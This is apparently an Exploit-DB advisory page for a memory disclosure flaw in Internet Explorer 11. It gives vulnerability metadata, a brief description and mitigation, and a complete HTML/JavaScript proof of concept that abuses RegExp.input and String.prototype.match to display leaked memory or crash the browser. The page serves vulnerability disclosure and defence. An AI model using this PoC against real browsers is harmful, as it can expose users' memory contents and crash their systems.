Memory Disclosure Vulnerability in Internet Explorer

vendor:

Internet Explorer

by:

Anonymous

8.8

CVSS

HIGH

Memory Disclosure

200

CWE

Product Name: Internet Explorer

Affected Version From: IE11

Affected Version To: IE11

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 64-bit

2020

Memory Disclosure Vulnerability in Internet Explorer

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. The proof of concept involves a script that uses the RegExp.input property to call the String.prototype.match method on a large string, which can result in pieces of memory being displayed.

Mitigation:

Users should ensure that their Internet Explorer is up to date with the latest security patches.

Source

Exploit-DB raw data:

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

=========================================
*/

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

/*
=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/